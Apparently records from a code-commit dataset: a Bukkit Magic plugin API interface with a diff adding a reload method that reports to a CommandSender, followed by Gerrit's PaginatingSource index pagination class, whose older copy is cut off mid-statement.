* * \subsection wands Creating Wands * * A plugin may create or modify Wand items. */ /** * This is the primary entry point into the Magic API. * * A Plugin should generally check for the "Magic" plugin, and * then cast that Plugin to MagicAPI to interact with it. * */ public interface MagicAPI { /** * Retrieve the Bukkit Plugin for Magic * * @return The Magic Plugin instance, likely "this" */ public Plugin getPlugin(); /** * Retrieve the Logger for this API instance. * * @return The logger being used by the API provider (usually MagicPlugin). */ public Logger getLogger(); /** * Check to see if a CommandSender has permission. * * This extends Bukkit's permission checks to account for special * Magic bypass flags and Autonoma behavior. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @return True if the CommandSender has the requested permission */ public boolean hasPermission(CommandSender sender, String pNode); /** * Check for permission, but include a default permission. This is generally used * to do permission checks against something you can't specify in the defaults (such * as a dynamically generated list), but would like permission to be enabled by * default. * * This is used, for instance, in Magic's list of wands and spells- players have * access to all spells by default, unless a -Magic.cast.spellname pnode is added. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @param defaultPermission set to true to enable permission by default * @return True if the sender has permission */ public boolean hasPermission(CommandSender sender, String pNode, boolean defaultPermission); /** * Save all Magic data. */ public void save(); /** * Reload all Magic configurations. */ public void reload(); /** * Reload all Magic configurations, report success/fail to sender */ public void reload(CommandSender sender); /** * Clear all image and schematic caches */ public void clearCache(); /** * Commit and clear all loaded undo queues * * @return True if anything was committed */ public boolean commit(); /** * Get all currently loaded Mage instances. * * These may be players or Automata (command blocks) * * @return The list of all currently active mages. */ public Collection<Mage> getMages(); /** * Get all currently loaded Mage instances that have * pending construction batches. * * These may be players or Automata (command blocks) * * @return The list of Mages that have pending constructions in progress. */ public Collection<Mage> getMagesWithPendingBatches(); public Collection<UndoList> getPendingUndo(); /** * Retrieve or create a Mage for a particular CommandSender. * * There is one Mage for the Console sender, one Mage for each Player, * and one Mage for each named Command Block. * * Each Mage is persistent and singular- two command blocks with the same * name, if loaded at the same time, will use the same Mage. This may * cause conflicts with cooldowns or other persistent Spell data. * * @param sender the CommandSender (Player, Command block, etc) to turn into a Mage * @return Mage instance, new, created or loaded. */ public Mage getMage(CommandSender sender); /** * Retrieve or create a Mage for a particular Entity. * * Every Entity should use its own Mage for casting spells. Entity * Mages are tracked by UUID, and their data is saved and restored * as normal. 
* * @param entity the Entity to turn into a Mage * @param sender the CommandSender to use, optional * @return Mage instance, new, created or loaded. */ public Mage getMage(Entity entity, CommandSender sender); /** * A utility method for giving an item to a player. This will place * the item in the player's hand if it is empty, else in the player's * inventory. If there is no room, the item will drop on the ground. * * If the item is a Wand, and it goes into the player's hand, it * will be activated. Make sure to use this method, or else make * sure to deal with activating wands as the player gets them. * * @param player The Player to give an item to * @param itemStack The ItemStack to giev the player, may be a Wand. */ public void giveItemToPlayer(Player player, ItemStack itemStack); /** * Give experience to a player, in a way that is safe for wands. * * This method may get removed in the future if Wands can be smarter * about XP being added externally. * * @param player The Player to give XP * @param xp The amount of XP to give */ public void giveExperienceToPlayer(Player player, int xp); /** * A utility method to get the names of all currently logged-in Players. * * Useful for tab-completion. * * @return The names of all logged-in players. */ public Collection<String> getPlayerNames(); /** * Retrieve the keys for all wand templates. These can be used * with createWand to create a new Wand from a template. * * @return A list of all known wand template keys. */ public Collection<String> getWandKeys(); /** * Create a new Magic item. This could be a wand, spell, upgrade * or brush. * * @param magicItemKey The template key, may be a wand, spell, etc. * @return An ItemStack representing the magic item. */ public ItemStack createItem(String magicItemKey); public ItemStack createItem(String magicItemKey, Mage mage); /** * Create a generic version of an item with no extra data. * @param magicItemKey The template key, may be a wand, spell, etc. * @return The specified item. */ public ItemStack createGenericItem(String magicItemKey); /** * Return the key name of an item, so it can be re-created with * createItem. * * @param item * @return */ public String getItemKey(ItemStack item); /** * Return a string description of an item. * * This will use the display name if set, then Vault if * present, then falling back to the Material name. * * @param item * @return A description of this item */ public String describeItem(ItemStack item); /** * Check to see if a player has a specific item. * * @param player * @param item * @return */ public boolean hasItem(Player player, ItemStack item); /** * Check to see if a player has a specific item, and remove it * from the player's inventory. * * @param player * @param item * @return */ public boolean takeItem(Player player, ItemStack item); /** * Create a new Wand from a template. * * Once created, a Wand is a unique item. It "remembers" which template * it was created from, but this is currently not used for anything. * * @param wandKey The template key, or blank for a default wand. * @return A new Wand instance, with a useable ItemStack. */ public Wand createWand(String wandKey); /** * Create an upgrade Wand item from a template. * * This can be used to create upgrade items from wand * templates that are not originally meant to be upgrades. * * @param wandKey The template key * @return A new Wand instance, converted to an upgrade if necessary. */ public Wand createUpgrade(String wandKey); /** * Load a Wand instance of an ItemStack. 
Will return null if the * given ItemStack does not have Wand NMS data. * * @param item The item to load Wand data from. * @return The wand instance, or null on error. */ public Wand getWand(ItemStack item); /** * Turn the given ItemStack into a wand * * @param item The item to use as the wand's icon. * @return The wand instance, or null on error. */ public Wand createWand(ItemStack item); /** * Create a new Wand instance out of a given Material type. * * This will create a new ItemStack to represent the Wand. * * @param iconMaterial The type of Material to use as the Wand icon. * @param iconData Data used for durability or icon variants. * @return A newly-created Wand. */ public Wand createWand(Material iconMaterial, short iconData); /** * Check to see if an existing item is a Wand. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a Wand, in which case getWand can be used. */ public boolean isWand(ItemStack item); /** * Check to see if an existing item is a wand upgrade. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getWand can be used. */ public boolean isUpgrade(ItemStack item); /** * Check to see if an existing item is a spell item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a spell, in which case getSpell can be used. */ public boolean isSpell(ItemStack item); /** * Check to see if an existing item is a material brush item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getBrush can be used. */ public boolean isBrush(ItemStack item); /** * Get the key of the Spell or SpellTemplate represented by an item. * * @param item The item to inspect * @return The key of the Spell represented by this item. */ public String getSpell(ItemStack item); /** * Get the key of the material brush represented by an item. * * @param item The item to inspect * @return The key of the material brush represented by this item. */ public String getBrush(ItemStack item); /** * Create an ItemStack that represents a Spell. * * This item will be absorbed by a Wand on activate, adding that Spell * to the Wand, if the Wand finds this item in a Player's inventory. * * @param spellKey The Spell to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createSpellItem(String spellKey); /** * Create an ItemStack that represents a Material Brush. * * This item will be absorbed by a Wand on activate, adding that brush * to the Wand, if the Wand finds this item in a Player's inventory. * * @param brushKey The Material brush to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createBrushItem(String brushKey); /** * Return a list of all known LostWand records. * * @return A list of all known LostWand data. */ public Collection<LostWand> getLostWands(); /** * Forget a specific LostWand. * * The ItemStack will not be removed if it still exists, and * a new LostWand record may get created if the ItemStack is found * again by the Chunk scanner. * * @param id The id of the LostWand to forget. */ public void removeLostWand(String id); /** * Get a list of all known Automaton records. * * @return The list of currently known Automaton blocks. */ public Collection<Automaton> getAutomata(); /** * Cast a specific Spell, with optional parameters. 
* * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * This Spell will be cast using the COMMAND Mage. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters); /** * Cast a specific Spell, with optional parameters, using a specific CommandSender and/or Player. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * The CommandSender and Player may differ, in which case both will be notified of Spell results. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @param sender The CommandSender that originated this Spell * @param entity The Entity this Spell is cast on behalf of, may be Player or differ from sender * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters, CommandSender sender, Entity entity); public boolean cast(String spellName, ConfigurationSection parameters, CommandSender sender, Entity entity); /** * Get a list of all currently loaded SpellTemplate records, as defined in spells.defaults.yml * and spells.yml * * A Spell is created for a Mage from a SpellTemplate. * * @return A list of all known SpellTemplate definitions. */ public Collection<SpellTemplate> getSpellTemplates(); public Collection<SpellTemplate> getSpellTemplates(boolean showHidden); /** * Retrieve a specific SpellTemplate. * * @param key The key of the SpellTemplate to look up. * @return The requested SpellTemplate, or null on failure. */ public SpellTemplate getSpellTemplate(String key); /** * Get a list of all valid Material Brush names. * * This will include all Block Materials, as well as special brushes * (copy, clone, erase, replicate, map) and any known schematic brushes. * * @return A list of all valid brush keys. */ public Collection<String> getBrushes(); /** * Get a list of all known schematics. * * These will be loaded from Magic's built-in schematic collection, * or from an external source (e.g. WorldEdit). * * The list may be empty if schematics are disabled. * * These are the raw schematic names, and do not have the "schematic:" prefix or ".schematic" extension. * * @return The list of known schematic names. */ public Collection<String> getSchematicNames(); /** * Get the MageController. * * The controller is used for more advanced plugin interaction, and is * used heavily by Spells themselves to interact with the Magic plugin's * internal functionality. * * @return The current MageController, there is only one. */ public MageController getController(); /** * Returns a written book item describing all of the spells in * a given category. * * @param category The category to look up * @param count How many to give (max 1 stack) * @return An ItemStack spell book */ public ItemStack getSpellBook(SpellCategory category, int count); /** * Return the Messages controller, which manages Magic's * localization store. */ public Messages getMessages(); }
src/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java
package com.elmakers.mine.bukkit.api.magic; import java.util.Collection; import java.util.logging.Logger; import com.elmakers.mine.bukkit.api.block.UndoList; import com.elmakers.mine.bukkit.api.spell.SpellCategory; import org.bukkit.Material; import org.bukkit.command.CommandSender; import org.bukkit.configuration.ConfigurationSection; import org.bukkit.entity.Entity; import org.bukkit.entity.Player; import org.bukkit.inventory.ItemStack; import org.bukkit.plugin.Plugin; import com.elmakers.mine.bukkit.api.spell.SpellTemplate; import com.elmakers.mine.bukkit.api.wand.LostWand; import com.elmakers.mine.bukkit.api.wand.Wand; /*! \mainpage Magic Bukkit Plugin API * * \section intro_sec Introduction * * This is the API for the Magic plugin for Bukkit. Other plugins can * use this API to integrate with Magic. * * If you wish to extend Magic, such as by adding a completely new Spell * or EffectPlayer class, you will need to build against MagicLib: * * http://jenkins.elmakers.com/job/MagicLib/doxygen/ * * \section issues_sec Issues * * For issues with the API, or suggestions, use our Issue Tracker: * * http://jira.elmakers.com/browse/API/ * * \section start_sec Getting Started * * If you haven't done so already, get started with Bukkit by getting a basic * shell of a plugin working. You should at least have a working Plugin that * loads in Bukkit (add a debug print to onEnable to be sure!) before you * start trying to integrate with other Plugins. See here for general help: * * http://wiki.bukkit.org/Plugin_Tutorial * * \section maven_sec Building with Maven * * Once you have a project set up, it is easy to build against the Magic API * with Maven. Simply add the elmakers repository to your repository list, * and then add a dependency for MagicAPI. A typical setup would look like: * * <pre> * &lt;dependencies&gt; * &lt;dependency&gt; * &lt;groupId&gt;org.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;bukkit&lt;/artifactId&gt; * &lt;version&gt;1.6.4-R2.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;dependency&gt; * &lt;groupId&gt;com.elmakers.mine.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;MagicAPI&lt;/artifactId&gt; * &lt;version&gt;1.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;/dependencies&gt; * &lt;repositories&gt; * &lt;repository&gt; * &lt;id&gt;bukkit-repo&lt;/id&gt; * &lt;url&gt;http://repo.bukkit.org/content/groups/public/ &lt;/url&gt; * &lt;/repository&gt; * &lt;repository&gt; * &lt;id&gt;elmakers-repo&lt;/id&gt; * &lt;url&gt;http://maven.elmakers.com/repository/ &lt;/url&gt; * &lt;/repository&gt; * &lt;/repositories&gt; * </pre> * * \section plugin_sec Getting the API reference * * A Plugin that wishes to interact with Magic should generally check * the PluginManager for the "Magic" plugin. If present, the Plugin may * cast it to MagicAPI and use it. * * If you wish to softdepend to Magic, make sure to not use any of these API classes * unless you know the Magic plugin is loaded. Make sure you're not building the API * into your plugin, it should always be referenced externally (e.g. "provided" in Maven). * * <pre> * public MagicAPI getMagicAPI() { * Plugin magicPlugin = Bukkit.getPluginManager().getPlugin("Magic"); * if (magicPlugin == null || !(magicPlugin instanceof MagicAPI)) { * return null; * } * return (MagicAPI)magicPlugin; * } * </pre> * * \section example_sec Examples * * \subsection casting Casting Spells * * A plugin may cast spells directly, or on behalf of logged in players. 
* * \subsection wands Creating Wands * * A plugin may create or modify Wand items. */ /** * This is the primary entry point into the Magic API. * * A Plugin should generally check for the "Magic" plugin, and * then cast that Plugin to MagicAPI to interact with it. * */ public interface MagicAPI { /** * Retrieve the Bukkit Plugin for Magic * * @return The Magic Plugin instance, likely "this" */ public Plugin getPlugin(); /** * Retrieve the Logger for this API instance. * * @return The logger being used by the API provider (usually MagicPlugin). */ public Logger getLogger(); /** * Check to see if a CommandSender has permission. * * This extends Bukkit's permission checks to account for special * Magic bypass flags and Autonoma behavior. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @return True if the CommandSender has the requested permission */ public boolean hasPermission(CommandSender sender, String pNode); /** * Check for permission, but include a default permission. This is generally used * to do permission checks against something you can't specify in the defaults (such * as a dynamically generated list), but would like permission to be enabled by * default. * * This is used, for instance, in Magic's list of wands and spells- players have * access to all spells by default, unless a -Magic.cast.spellname pnode is added. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @param defaultPermission set to true to enable permission by default * @return True if the sender has permission */ public boolean hasPermission(CommandSender sender, String pNode, boolean defaultPermission); /** * Save all Magic data. */ public void save(); /** * Reload all Magic configurations. */ public void reload(); /** * Clear all image and schematic caches */ public void clearCache(); /** * Commit and clear all loaded undo queues * * @return True if anything was committed */ public boolean commit(); /** * Get all currently loaded Mage instances. * * These may be players or Automata (command blocks) * * @return The list of all currently active mages. */ public Collection<Mage> getMages(); /** * Get all currently loaded Mage instances that have * pending construction batches. * * These may be players or Automata (command blocks) * * @return The list of Mages that have pending constructions in progress. */ public Collection<Mage> getMagesWithPendingBatches(); public Collection<UndoList> getPendingUndo(); /** * Retrieve or create a Mage for a particular CommandSender. * * There is one Mage for the Console sender, one Mage for each Player, * and one Mage for each named Command Block. * * Each Mage is persistent and singular- two command blocks with the same * name, if loaded at the same time, will use the same Mage. This may * cause conflicts with cooldowns or other persistent Spell data. * * @param sender the CommandSender (Player, Command block, etc) to turn into a Mage * @return Mage instance, new, created or loaded. */ public Mage getMage(CommandSender sender); /** * Retrieve or create a Mage for a particular Entity. * * Every Entity should use its own Mage for casting spells. Entity * Mages are tracked by UUID, and their data is saved and restored * as normal. * * @param entity the Entity to turn into a Mage * @param sender the CommandSender to use, optional * @return Mage instance, new, created or loaded. 
*/ public Mage getMage(Entity entity, CommandSender sender); /** * A utility method for giving an item to a player. This will place * the item in the player's hand if it is empty, else in the player's * inventory. If there is no room, the item will drop on the ground. * * If the item is a Wand, and it goes into the player's hand, it * will be activated. Make sure to use this method, or else make * sure to deal with activating wands as the player gets them. * * @param player The Player to give an item to * @param itemStack The ItemStack to giev the player, may be a Wand. */ public void giveItemToPlayer(Player player, ItemStack itemStack); /** * Give experience to a player, in a way that is safe for wands. * * This method may get removed in the future if Wands can be smarter * about XP being added externally. * * @param player The Player to give XP * @param xp The amount of XP to give */ public void giveExperienceToPlayer(Player player, int xp); /** * A utility method to get the names of all currently logged-in Players. * * Useful for tab-completion. * * @return The names of all logged-in players. */ public Collection<String> getPlayerNames(); /** * Retrieve the keys for all wand templates. These can be used * with createWand to create a new Wand from a template. * * @return A list of all known wand template keys. */ public Collection<String> getWandKeys(); /** * Create a new Magic item. This could be a wand, spell, upgrade * or brush. * * @param magicItemKey The template key, may be a wand, spell, etc. * @return An ItemStack representing the magic item. */ public ItemStack createItem(String magicItemKey); public ItemStack createItem(String magicItemKey, Mage mage); /** * Create a generic version of an item with no extra data. * @param magicItemKey The template key, may be a wand, spell, etc. * @return The specified item. */ public ItemStack createGenericItem(String magicItemKey); /** * Return the key name of an item, so it can be re-created with * createItem. * * @param item * @return */ public String getItemKey(ItemStack item); /** * Return a string description of an item. * * This will use the display name if set, then Vault if * present, then falling back to the Material name. * * @param item * @return A description of this item */ public String describeItem(ItemStack item); /** * Check to see if a player has a specific item. * * @param player * @param item * @return */ public boolean hasItem(Player player, ItemStack item); /** * Check to see if a player has a specific item, and remove it * from the player's inventory. * * @param player * @param item * @return */ public boolean takeItem(Player player, ItemStack item); /** * Create a new Wand from a template. * * Once created, a Wand is a unique item. It "remembers" which template * it was created from, but this is currently not used for anything. * * @param wandKey The template key, or blank for a default wand. * @return A new Wand instance, with a useable ItemStack. */ public Wand createWand(String wandKey); /** * Create an upgrade Wand item from a template. * * This can be used to create upgrade items from wand * templates that are not originally meant to be upgrades. * * @param wandKey The template key * @return A new Wand instance, converted to an upgrade if necessary. */ public Wand createUpgrade(String wandKey); /** * Load a Wand instance of an ItemStack. Will return null if the * given ItemStack does not have Wand NMS data. * * @param item The item to load Wand data from. * @return The wand instance, or null on error. 
*/ public Wand getWand(ItemStack item); /** * Turn the given ItemStack into a wand * * @param item The item to use as the wand's icon. * @return The wand instance, or null on error. */ public Wand createWand(ItemStack item); /** * Create a new Wand instance out of a given Material type. * * This will create a new ItemStack to represent the Wand. * * @param iconMaterial The type of Material to use as the Wand icon. * @param iconData Data used for durability or icon variants. * @return A newly-created Wand. */ public Wand createWand(Material iconMaterial, short iconData); /** * Check to see if an existing item is a Wand. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a Wand, in which case getWand can be used. */ public boolean isWand(ItemStack item); /** * Check to see if an existing item is a wand upgrade. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getWand can be used. */ public boolean isUpgrade(ItemStack item); /** * Check to see if an existing item is a spell item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a spell, in which case getSpell can be used. */ public boolean isSpell(ItemStack item); /** * Check to see if an existing item is a material brush item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getBrush can be used. */ public boolean isBrush(ItemStack item); /** * Get the key of the Spell or SpellTemplate represented by an item. * * @param item The item to inspect * @return The key of the Spell represented by this item. */ public String getSpell(ItemStack item); /** * Get the key of the material brush represented by an item. * * @param item The item to inspect * @return The key of the material brush represented by this item. */ public String getBrush(ItemStack item); /** * Create an ItemStack that represents a Spell. * * This item will be absorbed by a Wand on activate, adding that Spell * to the Wand, if the Wand finds this item in a Player's inventory. * * @param spellKey The Spell to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createSpellItem(String spellKey); /** * Create an ItemStack that represents a Material Brush. * * This item will be absorbed by a Wand on activate, adding that brush * to the Wand, if the Wand finds this item in a Player's inventory. * * @param brushKey The Material brush to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createBrushItem(String brushKey); /** * Return a list of all known LostWand records. * * @return A list of all known LostWand data. */ public Collection<LostWand> getLostWands(); /** * Forget a specific LostWand. * * The ItemStack will not be removed if it still exists, and * a new LostWand record may get created if the ItemStack is found * again by the Chunk scanner. * * @param id The id of the LostWand to forget. */ public void removeLostWand(String id); /** * Get a list of all known Automaton records. * * @return The list of currently known Automaton blocks. */ public Collection<Automaton> getAutomata(); /** * Cast a specific Spell, with optional parameters. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * This Spell will be cast using the COMMAND Mage. 
* * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters); /** * Cast a specific Spell, with optional parameters, using a specific CommandSender and/or Player. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * The CommandSender and Player may differ, in which case both will be notified of Spell results. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @param sender The CommandSender that originated this Spell * @param entity The Entity this Spell is cast on behalf of, may be Player or differ from sender * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters, CommandSender sender, Entity entity); public boolean cast(String spellName, ConfigurationSection parameters, CommandSender sender, Entity entity); /** * Get a list of all currently loaded SpellTemplate records, as defined in spells.defaults.yml * and spells.yml * * A Spell is created for a Mage from a SpellTemplate. * * @return A list of all known SpellTemplate definitions. */ public Collection<SpellTemplate> getSpellTemplates(); public Collection<SpellTemplate> getSpellTemplates(boolean showHidden); /** * Retrieve a specific SpellTemplate. * * @param key The key of the SpellTemplate to look up. * @return The requested SpellTemplate, or null on failure. */ public SpellTemplate getSpellTemplate(String key); /** * Get a list of all valid Material Brush names. * * This will include all Block Materials, as well as special brushes * (copy, clone, erase, replicate, map) and any known schematic brushes. * * @return A list of all valid brush keys. */ public Collection<String> getBrushes(); /** * Get a list of all known schematics. * * These will be loaded from Magic's built-in schematic collection, * or from an external source (e.g. WorldEdit). * * The list may be empty if schematics are disabled. * * These are the raw schematic names, and do not have the "schematic:" prefix or ".schematic" extension. * * @return The list of known schematic names. */ public Collection<String> getSchematicNames(); /** * Get the MageController. * * The controller is used for more advanced plugin interaction, and is * used heavily by Spells themselves to interact with the Magic plugin's * internal functionality. * * @return The current MageController, there is only one. */ public MageController getController(); /** * Returns a written book item describing all of the spells in * a given category. * * @param category The category to look up * @param count How many to give (max 1 stack) * @return An ItemStack spell book */ public ItemStack getSpellBook(SpellCategory category, int count); /** * Return the Messages controller, which manages Magic's * localization store. */ public Messages getMessages(); }
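The interface above only declares the API surface, so a brief usage sketch may help make the calling conventions concrete. This is a hypothetical illustration, not code from the Magic plugin: how the MagicAPI instance is obtained, the item key "wand", the spell name "blast", and the parameter values are all placeholder assumptions, while the method signatures (createItem, giveItemToPlayer, cast) are taken from the declarations above.

// Hypothetical usage sketch of the MagicAPI declared above. Only the method
// signatures come from the interface; the item key, spell name, and parameter
// values are placeholders, and how 'api' is obtained is left as an assumption.
import org.bukkit.entity.Player;
import org.bukkit.inventory.ItemStack;

import com.elmakers.mine.bukkit.api.magic.MagicAPI;

public class MagicApiUsageSketch {

    // 'api' is assumed to have been looked up from the Magic plugin elsewhere.
    public void equipAndCast(MagicAPI api, Player player) {
        // Create a magic item from a template key and hand it to the player;
        // giveItemToPlayer places it in the hand/inventory and activates wands.
        ItemStack item = api.createItem("wand");   // "wand" is a placeholder key
        api.giveItemToPlayer(player, item);

        // Cast a spell on the player's behalf; parameters alternate key/value.
        api.cast("blast",
                 new String[] { "radius", "8", "range", "32" },
                 player, player);   // a Player is both a CommandSender and an Entity
    }
}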
Add a reload method that can provide feedback to a CommandSender
src/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java
Add a reload method that can provide feedback to a CommandSender
<ide><path>rc/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java <ide> public void reload(); <ide> <ide> /** <add> * Reload all Magic configurations, report success/fail to sender <add> */ <add> public void reload(CommandSender sender); <add> <add> /** <ide> * Clear all image and schematic caches <ide> */ <ide> public void clearCache();
Java
apache-2.0
303e66e42258ca419cd5431d7a0fb071e4643a85
0
GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit,GerritCodeReview/gerrit
// Copyright (C) 2022 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.index.query; import static com.google.common.base.Preconditions.checkArgument; import com.google.common.collect.FluentIterable; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Ordering; import com.google.gerrit.exceptions.StorageException; import com.google.gerrit.index.IndexConfig; import com.google.gerrit.index.PaginationType; import com.google.gerrit.index.QueryOptions; import java.util.ArrayList; import java.util.List; public class PaginatingSource<T> implements DataSource<T> { protected final DataSource<T> source; private final int start; private final int cardinality; private final IndexConfig indexConfig; public PaginatingSource(DataSource<T> source, int start, IndexConfig indexConfig) { checkArgument(start >= 0, "negative start: %s", start); this.source = source; this.start = start; this.cardinality = source.getCardinality(); this.indexConfig = indexConfig; } @Override public ResultSet<T> read() { if (source == null) { throw new StorageException("No DataSource: " + this); } // ResultSets are lazy. Calling #read here first and then dealing with ResultSets only when // requested allows the index to run asynchronous queries. ResultSet<T> resultSet = source.read(); return new LazyResultSet<>( () -> { List<T> r = new ArrayList<>(); T last = null; int pageResultSize = 0; for (T data : buffer(resultSet)) { if (!isMatchable() || match(data)) { r.add(data); } last = data; pageResultSize++; } if (last != null && source instanceof Paginated) { // Restart source and continue if we have not filled the // full limit the caller wants. // @SuppressWarnings("unchecked") Paginated<T> p = (Paginated<T>) source; QueryOptions opts = p.getOptions(); final int limit = opts.limit(); int pageSize = opts.pageSize(); int pageSizeMultiplier = opts.pageSizeMultiplier(); Object searchAfter = resultSet.searchAfter(); int nextStart = pageResultSize; while (pageResultSize == pageSize && r.size() <= limit) { // get 1 more than the limit pageSize = getNextPageSize(pageSize, pageSizeMultiplier); ResultSet<T> next = indexConfig.paginationType().equals(PaginationType.SEARCH_AFTER) ? 
p.restart(searchAfter, pageSize) : p.restart(nextStart, pageSize); pageResultSize = 0; for (T data : buffer(next)) { if (match(data)) { r.add(data); } pageResultSize++; } nextStart += pageResultSize; searchAfter = next.searchAfter(); } } if (start >= r.size()) { return ImmutableList.of(); } else if (start > 0) { return ImmutableList.copyOf(r.subList(start, r.size())); } return ImmutableList.copyOf(r); }); } @Override public ResultSet<FieldBundle> readRaw() { // TODO(hiesel): Implement throw new UnsupportedOperationException("not implemented"); } private Iterable<T> buffer(ResultSet<T> scanner) { return FluentIterable.from(Iterables.partition(scanner, 50)) .transformAndConcat(this::transformBuffer); } /** * Checks whether the given object matches. * * @param object the object to be matched * @return whether the given object matches */ protected boolean match(T object) { return true; } protected boolean isMatchable() { return true; } protected List<T> transformBuffer(List<T> buffer) { return buffer; } @Override public int getCardinality() { return cardinality; } private int getNextPageSize(int pageSize, int pageSizeMultiplier) { List<Integer> possiblePageSizes = new ArrayList<>(3); try { possiblePageSizes.add(Math.multiplyExact(pageSize, pageSizeMultiplier)); } catch (ArithmeticException e) { possiblePageSizes.add(Integer.MAX_VALUE); } if (indexConfig.maxPageSize() > 0) { possiblePageSizes.add(indexConfig.maxPageSize()); } if (indexConfig.maxLimit() > 0) { possiblePageSizes.add(indexConfig.maxLimit()); } return Ordering.natural().min(possiblePageSizes); } }
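The page-size growth rule in getNextPageSize above is compact but easy to misread, so the following standalone sketch restates it outside the class where it can be exercised directly. The class name and the numeric values used in main are illustrative assumptions, not Gerrit defaults.

// Standalone restatement of the page-size growth rule from getNextPageSize:
// grow the previous page size by the multiplier, treat int overflow as
// Integer.MAX_VALUE, and cap by maxPageSize / maxLimit when configured (> 0).
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class PageSizeSketch {

    static int nextPageSize(int pageSize, int multiplier, int maxPageSize, int maxLimit) {
        List<Integer> candidates = new ArrayList<>(3);
        try {
            candidates.add(Math.multiplyExact(pageSize, multiplier));
        } catch (ArithmeticException e) {
            candidates.add(Integer.MAX_VALUE);   // overflow: use the largest int
        }
        if (maxPageSize > 0) {
            candidates.add(maxPageSize);
        }
        if (maxLimit > 0) {
            candidates.add(maxLimit);
        }
        return Collections.min(candidates);      // the smallest candidate wins
    }

    public static void main(String[] args) {
        // With an assumed multiplier of 5 and an assumed maxPageSize of 1000:
        System.out.println(nextPageSize(50, 5, 1000, 0));    // 250
        System.out.println(nextPageSize(250, 5, 1000, 0));   // 1000 (capped)
    }
}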
java/com/google/gerrit/index/query/PaginatingSource.java
// Copyright (C) 2022 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.index.query; import static com.google.common.base.Preconditions.checkArgument; import com.google.common.collect.FluentIterable; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Ordering; import com.google.gerrit.exceptions.StorageException; import com.google.gerrit.index.IndexConfig; import com.google.gerrit.index.PaginationType; import com.google.gerrit.index.QueryOptions; import java.util.ArrayList; import java.util.List; public class PaginatingSource<T> implements DataSource<T> { protected final DataSource<T> source; private final int start; private final int cardinality; private final IndexConfig indexConfig; public PaginatingSource(DataSource<T> source, int start, IndexConfig indexConfig) { checkArgument(start >= 0, "negative start: %s", start); this.source = source; this.start = start; this.cardinality = source.getCardinality(); this.indexConfig = indexConfig; } @Override public ResultSet<T> read() { if (source == null) { throw new StorageException("No DataSource: " + this); } // ResultSets are lazy. Calling #read here first and then dealing with ResultSets only when // requested allows the index to run asynchronous queries. ResultSet<T> resultSet = source.read(); return new LazyResultSet<>( () -> { List<T> r = new ArrayList<>(); T last = null; int pageResultSize = 0; for (T data : buffer(resultSet)) { if (!isMatchable() || match(data)) { r.add(data); } last = data; pageResultSize++; } if (last != null && source instanceof Paginated) { // Restart source and continue if we have not filled the // full limit the caller wants. // @SuppressWarnings("unchecked") Paginated<T> p = (Paginated<T>) source; QueryOptions opts = p.getOptions(); final int limit = opts.limit(); int pageSize = opts.pageSize(); int pageSizeMultiplier = opts.pageSizeMultiplier(); Object searchAfter = resultSet.searchAfter(); int nextStart = pageResultSize; while 